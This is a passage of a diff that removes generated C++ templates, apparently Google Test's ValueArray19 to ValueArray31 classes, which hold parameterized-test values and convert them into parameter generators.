-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray19& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-class ValueArray20 {
- public:
-  ValueArray20(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray20& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-class ValueArray21 {
- public:
-  ValueArray21(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray21& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-class ValueArray22 {
- public:
-  ValueArray22(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray22& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-class ValueArray23 {
- public:
-  ValueArray23(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray23& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-class ValueArray24 {
- public:
-  ValueArray24(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray24& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-class ValueArray25 {
- public:
-  ValueArray25(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24,
-      T25 v25) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray25& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-class ValueArray26 {
- public:
-  ValueArray26(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray26& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-class ValueArray27 {
- public:
-  ValueArray27(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19),
-      v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25),
-      v26_(v26), v27_(v27) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray27& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-class ValueArray28 {
- public:
-  ValueArray28(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24),
-      v25_(v25), v26_(v26), v27_(v27), v28_(v28) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray28& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-class ValueArray29 {
- public:
-  ValueArray29(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23),
-      v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray29& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-class ValueArray30 {
- public:
-  ValueArray30(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray30& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-class ValueArray31 {
- public:
-  ValueArray31(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_)};
-    return ValuesIn(array);
-  }
-
- private:
